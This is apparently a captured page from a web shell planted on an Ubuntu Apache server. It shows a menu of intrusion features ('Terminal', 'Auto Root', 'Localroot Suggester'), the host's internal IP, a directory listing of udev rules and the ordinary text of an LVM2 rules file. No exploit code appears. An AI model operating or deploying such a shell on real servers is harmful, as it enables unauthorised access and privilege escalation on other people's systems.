Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
snap /
core20 /
2769 /
usr /
lib /
udev /
rules.d /
Delete
Unzip
Name
Size
Permission
Date
Action
40-vm-hotadd.rules
655
B
-rw-r--r--
2025-06-03 05:05
50-firmware.rules
210
B
-rw-r--r--
2024-06-18 05:29
50-udev-default.rules
3.84
KB
-rw-r--r--
2025-06-03 05:05
55-dm.rules
7.1
KB
-rw-r--r--
2020-02-14 06:21
60-autosuspend-chromiumos.rules
8.39
KB
-rw-r--r--
2025-06-03 05:05
60-block.rules
703
B
-rw-r--r--
2020-04-02 02:23
60-cdrom_id.rules
1.05
KB
-rw-r--r--
2020-04-02 02:23
60-drm.rules
413
B
-rw-r--r--
2020-04-02 02:23
60-evdev.rules
990
B
-rw-r--r--
2020-04-02 02:23
60-fido-id.rules
394
B
-rw-r--r--
2020-04-02 02:23
60-input-id.rules
282
B
-rw-r--r--
2020-04-02 02:23
60-persistent-alsa.rules
616
B
-rw-r--r--
2020-04-02 02:23
60-persistent-input.rules
2.65
KB
-rw-r--r--
2020-04-02 02:23
60-persistent-storage-dm.rules
1.75
KB
-rw-r--r--
2020-02-14 06:21
60-persistent-storage-tape.rules
2.08
KB
-rw-r--r--
2020-04-02 02:23
60-persistent-storage.rules
7.6
KB
-rw-r--r--
2025-06-03 05:05
60-persistent-v4l.rules
769
B
-rw-r--r--
2020-04-02 02:23
60-sensor.rules
736
B
-rw-r--r--
2020-04-02 02:23
60-serial.rules
1.16
KB
-rw-r--r--
2020-04-02 02:23
61-autosuspend-manual.rules
565
B
-rw-r--r--
2020-04-02 02:23
61-persistent-storage-android.rules
456
B
-rw-r--r--
2025-06-03 05:05
64-btrfs.rules
612
B
-rw-r--r--
2025-06-03 05:05
66-azure-ephemeral.rules
1.91
KB
-rw-r--r--
2025-01-16 00:24
66-snapd-autoimport.rules
169
B
-rw-r--r--
2026-02-11 09:16
70-joystick.rules
432
B
-rw-r--r--
2020-04-02 02:23
70-mouse.rules
734
B
-rw-r--r--
2020-04-02 02:23
70-power-switch.rules
568
B
-rw-r--r--
2020-04-02 02:23
70-touchpad.rules
473
B
-rw-r--r--
2020-04-02 02:23
70-uaccess.rules
2.73
KB
-rw-r--r--
2025-06-03 05:05
71-power-switch-proliant.rules
461
B
-rw-r--r--
2025-06-03 05:05
71-seat.rules
3.69
KB
-rw-r--r--
2025-06-03 05:05
73-seat-late.rules
636
B
-rw-r--r--
2025-06-03 05:05
73-special-net-names.rules
969
B
-rw-r--r--
2024-06-18 05:29
75-net-description.rules
452
B
-rw-r--r--
2020-04-02 02:23
75-probe_mtd.rules
174
B
-rw-r--r--
2020-04-02 02:23
78-graphics-card.rules
965
B
-rw-r--r--
2025-06-03 05:05
78-sound-card.rules
4.7
KB
-rw-r--r--
2020-04-02 02:23
80-debian-compat.rules
1.34
KB
-rw-r--r--
2024-06-18 05:29
80-drivers.rules
615
B
-rw-r--r--
2020-04-02 02:23
80-net-setup-link.rules
295
B
-rw-r--r--
2025-06-03 05:05
81-net-dhcp.rules
528
B
-rw-r--r--
2025-06-03 05:05
90-rtc-sys-time-init.rules
950
B
-rw-r--r--
2026-02-11 09:16
95-dm-notify.rules
479
B
-rw-r--r--
2020-02-14 06:21
96-e2scrub.rules
171
B
-rw-r--r--
2023-10-09 10:56
99-systemd.rules
4.6
KB
-rw-r--r--
2025-06-03 05:05
Save
Rename
# Copyright (C) 2009 Red Hat, Inc. All rights reserved. # # This file is part of LVM2. # Udev rules for device-mapper devices. # # These rules create symlinks in /dev/disk directory. # Symlinks that depend on probing filesystem type, # label and uuid are created only if the device is not # suspended. # "add" event is processed on coldplug only! ACTION!="add|change", GOTO="dm_end" ENV{DM_UDEV_RULES_VSN}!="?*", GOTO="dm_end" ENV{DM_UDEV_DISABLE_DISK_RULES_FLAG}=="1", GOTO="dm_end" SYMLINK+="disk/by-id/dm-name-$env{DM_NAME}" ENV{DM_UUID}=="?*", SYMLINK+="disk/by-id/dm-uuid-$env{DM_UUID}" ENV{DM_SUSPENDED}=="1", GOTO="dm_end" ENV{DM_NOSCAN}=="1", GOTO="dm_watch" IMPORT{builtin}="blkid" ENV{DM_UDEV_LOW_PRIORITY_FLAG}=="1", OPTIONS="link_priority=-100" ENV{ID_FS_USAGE}=="filesystem|other|crypto", ENV{ID_FS_UUID_ENC}=="?*", SYMLINK+="disk/by-uuid/$env{ID_FS_UUID_ENC}" ENV{ID_FS_USAGE}=="filesystem|other", ENV{ID_FS_LABEL_ENC}=="?*", SYMLINK+="disk/by-label/$env{ID_FS_LABEL_ENC}" ENV{ID_PART_ENTRY_UUID}=="?*", SYMLINK+="disk/by-partuuid/$env{ID_PART_ENTRY_UUID}" ENV{ID_PART_ENTRY_SCHEME}=="gpt", ENV{ID_PART_ENTRY_NAME}=="?*", SYMLINK+="disk/by-partlabel/$env{ID_PART_ENTRY_NAME}" ENV{ID_PART_ENTRY_SCHEME}=="gpt", ENV{ID_PART_GPT_AUTO_ROOT}=="1", SYMLINK+="gpt-auto-root" # Add inotify watch to track changes on this device. # Using the watch rule is not optimal - it generates a lot of spurious # and useless events whenever the device opened for read-write is closed. # The best would be to generete the event directly in the tool changing # relevant information so only relevant events will be processed # (like creating a filesystem, changing filesystem label etc.). # # But let's use this until we have something better... LABEL="dm_watch" OPTIONS+="watch" LABEL="dm_end"